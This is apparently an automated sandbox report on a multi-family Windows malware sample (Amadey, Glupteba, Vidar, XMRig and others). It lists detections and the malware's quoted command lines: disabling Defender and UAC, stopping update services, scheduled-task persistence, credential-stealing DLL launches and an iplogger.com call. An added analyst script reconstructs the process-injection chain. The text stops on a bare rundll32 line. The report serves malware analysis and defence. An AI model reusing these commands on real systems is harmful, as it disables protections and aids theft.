Malware Analysis Report

2025-01-02 09:02

Sample ID 231005-ke5l4ahf6v
Target file
SHA256 7cd7bf6e8ec89fecb6efbad8f40556bd1e2433b58864cec67c216bbd0bacee74
Tags
amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx xmrig discovery miner persistence
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

7cd7bf6e8ec89fecb6efbad8f40556bd1e2433b58864cec67c216bbd0bacee74

Threat Level: Known bad

The file was found to be: Known bad.

Malicious Activity Summary

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

xmrig

Glupteba payload

Windows security bypass

Vidar

Detect Fabookie payload

Danabot

Fabookie

Glupteba

UAC bypass

XMRig Miner payload

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Reads user/profile data of web browsers

.NET Reactor protector

Drops startup file

Windows security modification

UPX packed file

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

System policy modification

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Creates scheduled task(s)

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 08:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 08:31

Reported

2023-10-05 08:34

Platform

win7-20230831-en

Max time kernel

10s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
(2 matches, no indicator details recorded)

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
(11 matches, no indicator details recorded)

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
(5 matches, no indicator details recorded)

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q9ecG5Jiu97qnIUp7o9WTCJj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B8CVO7aSC3mrHkzVNqTgC7IW.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4T1iwVNIMtRLpJvazjYQB2wf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkV1L7YSDkPd1qLEbbdLvHRg.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l5OiBVWFni3wDQgUDHe62X67.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7hfei201LExqEGNOQaWMSudw.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uPwOhD5iuzwpeA8mmGSKWXH4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

UPX packed file

upx
Description Indicator Process Target
(5 matches, no indicator details recorded)

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2476 set thread context of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
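Added example (analyst code, not part of the sandbox report): the WriteProcessMemory and SetThreadContext rows above are enough to rebuild the injection chain, and doing so shows why RegSvcs.exe, a signed .NET Framework utility, is the real parent of every payload dropped into C:\Users\Admin\Pictures. A target that receives both a memory write and a thread-context change from the same source (file.exe, PID 2476, into RegSvcs.exe, PID 2408) is the process-hollowing pattern; a memory write on its own also appears for ordinary parent-to-child launches (nhdues.exe into schtasks.exe), so the script keys the "hollowed" label on the combination. The row text is a constructed subset copied from the tables above with the repeated rows dropped; the row grammar it parses is the one this report uses and is an assumption for any other source.

```python
"""Rebuild the injection / launch chain from the sandbox's memory-write and thread-context rows."""
import re
from collections import defaultdict

# Constructed sample: rows copied from the two signature tables above, repeats dropped.
SAMPLE_EVENTS = r"""
PID 2476 set thread context of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
"""

# Row grammar of this report ("PID <src> <verb> <dst> N/A <src image> <dst image>");
# an assumption for any other sandbox's output.
EVENT = re.compile(r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)$")


def parse_events(text):
    """Return (src_pid, kind, dst_pid, src_image, dst_image) tuples; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT.match(line.strip())
        if m:
            src, verb, dst, src_img, dst_img = m.groups()
            kind = "ctx" if verb.startswith("set") else "write"
            events.append((int(src), kind, int(dst), src_img, dst_img))
    return events


def build_graph(events):
    """names: pid -> image path; writes / ctx: source pid -> set of target pids."""
    names, writes, ctx = {}, defaultdict(set), defaultdict(set)
    for src, kind, dst, src_img, dst_img in events:
        names[src], names[dst] = src_img, dst_img
        (ctx if kind == "ctx" else writes)[src].add(dst)
    return names, writes, ctx


def hollowed_targets(text):
    """{target pid: source pid} where the source both wrote memory and set thread context.

    A write on its own also shows up for ordinary parent-to-child launches, so the
    combination is what marks a hollowed / thread-hijacked host process."""
    _, writes, ctx = build_graph(parse_events(text))
    return {dst: src for src in ctx for dst in ctx[src] if dst in writes[src]}


def root_pids(text):
    """Sources that were never themselves a target: the top of each chain."""
    events = parse_events(text)
    return {e[0] for e in events} - {e[2] for e in events}


def render_tree(text, root):
    """Indented lines following the memory-write edges down from root."""
    events = parse_events(text)
    names, writes, _ = build_graph(events)
    hollowed = hollowed_targets(text)
    lines, seen = [], set()

    def walk(pid, depth):
        if pid in seen:          # guard against a cycle in malformed input
            return
        seen.add(pid)
        name = names[pid].rsplit("\\", 1)[-1]
        tag = f" [hollowed by {hollowed[pid]}]" if pid in hollowed else ""
        lines.append(f"{'  ' * depth}{pid} {name}{tag}")
        for child in sorted(writes.get(pid, ())):
            walk(child, depth + 1)

    walk(root, 0)
    return lines


if __name__ == "__main__":
    for root in sorted(root_pids(SAMPLE_EVENTS)):
        print("\n".join(render_tree(SAMPLE_EVENTS, root)))
```

Run as a script it prints one tree rooted at file.exe: RegSvcs.exe carries the hollowed marker, the Pictures\*.exe droppers hang under it rather than under file.exe, nhdues.exe (the Amadey copy) sits under one of them with its schtasks.exe child, and powershell.exe (the Defender-exclusion helper) is file.exe's only other direct child. The same walk applied to an EDR's process-access telemetry gives the parentage that the plain process list obscures.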

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe

"C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe"

C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe

"C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe

"C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe"

C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe

"C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\y0hzJjQsjwag2SqAwxiJtj21.exe

"C:\Users\Admin\Pictures\y0hzJjQsjwag2SqAwxiJtj21.exe"

C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe

"C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe" --silent --allusers=0

C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe

"C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\Y4cHvpq7IICxYtIKU0BzrBsn.exe

"C:\Users\Admin\Pictures\Y4cHvpq7IICxYtIKU0BzrBsn.exe"

C:\Users\Admin\Pictures\QP72Zw6573wQr3Slm5KXvswp.exe

"C:\Users\Admin\Pictures\QP72Zw6573wQr3Slm5KXvswp.exe"

C:\Users\Admin\AppData\Local\Temp\is-61RGG.tmp\YWjpdLRkE9QOyniJrKs0TD5A.tmp

"C:\Users\Admin\AppData\Local\Temp\is-61RGG.tmp\YWjpdLRkE9QOyniJrKs0TD5A.tmp" /SL5="$C011E,491750,408064,C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe"

C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe

"C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

"C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 384

C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe

"C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp" /SL5="$201CE,833775,56832,C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005083231.log C:\Windows\Logs\CBS\CbsPersist_20231005083231.cab

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7056299293.exe"

C:\Users\Admin\AppData\Local\Temp\7056299293.exe

"C:\Users\Admin\AppData\Local\Temp\7056299293.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "CmyyXOQjKrcAhRRx5JqyGuiN.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "CmyyXOQjKrcAhRRx5JqyGuiN.exe" /f & erase "C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe" & exit

C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe

"C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe"

C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe

"C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\taskeng.exe

taskeng.exe {88F3D40F-6C75-495F-B96D-BFA86ADDBEB9} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\rundll32.exe

